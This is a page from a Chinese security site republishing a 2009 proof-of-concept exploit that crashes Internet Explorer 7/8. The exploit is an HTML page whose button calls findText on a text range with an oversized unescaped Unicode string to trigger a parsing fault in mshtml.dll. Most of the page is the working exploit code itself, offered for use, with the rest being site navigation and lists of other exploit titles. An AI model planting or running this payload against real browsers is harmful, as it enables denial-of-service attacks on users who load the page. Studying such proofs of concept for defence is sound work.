首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS Internet Explorer 7/8 findText Unicode Parsing Crash Exploit
来源:AmesianX@gmail.com 作者:AmesianX 发布时间:2009-07-27  

<meta http-equiv="Context-Type" content="text/html; charset=US-ASCII">
<!--
Contact:h0n9t3n@gmail.com,AmesianX@gmail.com
Title: MS Internet Explorer findText Unicode Parsing error
Vulnerability (mshtml.dll)
Bug discovered: Hong10
PoC code: AmesianX & Hong10
Critical: low
Impact: MS Internet Explorer 7/8 Crash
Where: From remote
Tested Operating System: Windows XP SP3 FULL PATCHED (Korean Language)

Solution: I don't know..

Description:
 The following bug was tested on the latest version of Internet
Explorer 7/8.

by research team NSHC
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>IE findText crash</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
<input type="button" value="exploit" onclick="do_crash();">
Hit the button after ie7/8 crash..
<script>
function do_crash()
{
var o1=document.createElement("input");
o1.type="text";  //or password
o1.id="powerhacker";
o1.value="AAAA";
document.body.appendChild(o1);
var r= o1.createTextRange();
r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1);
//maybe string length allocated stack but over length allocated heap memory
//r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1,131072);
//this code is no crash becase 3 parameter
}
</script>
</body></html>
<html><body></body></html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Scripteen Free Image Hosting S
·Pixaria Gallery 2.3.5 (file) R
·Wordpress 2.8.1 (url) Remote C
·Oracle version 11.1.0.6.0 win3
·Mozilla Firefox 3.5 (Font tags
·The Network Foundation compone
·PHP Live! 3.2.1/2 (x) Remote B
·Mysql5crack Tool
·WzdFTPD <= 8.0 Remote Denial o
·Ekiga 2.0.5 (GetHostAddress) R
·URA 3.0 (cat) remote SQL injec
·OpenH323 Opal SIP Protocol Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved